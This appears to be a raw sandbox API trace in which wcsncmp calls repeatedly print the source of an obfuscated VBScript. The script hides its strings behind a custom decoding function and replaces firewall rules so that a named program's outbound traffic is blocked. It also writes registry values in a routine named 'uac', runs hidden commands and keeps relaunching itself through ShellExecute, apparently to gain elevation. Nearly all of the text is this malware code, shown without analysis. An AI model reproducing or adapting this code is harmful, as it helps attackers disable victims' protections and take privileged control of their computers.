bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 99 [0222.987] wcsncmp (_String1="olicy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0222.987] wcsncmp (_String1="licy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0222.987] wcsncmp (_String1="icy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0222.987] wcsncmp (_String1="cy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0222.987] wcsncmp (_String1="y\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, 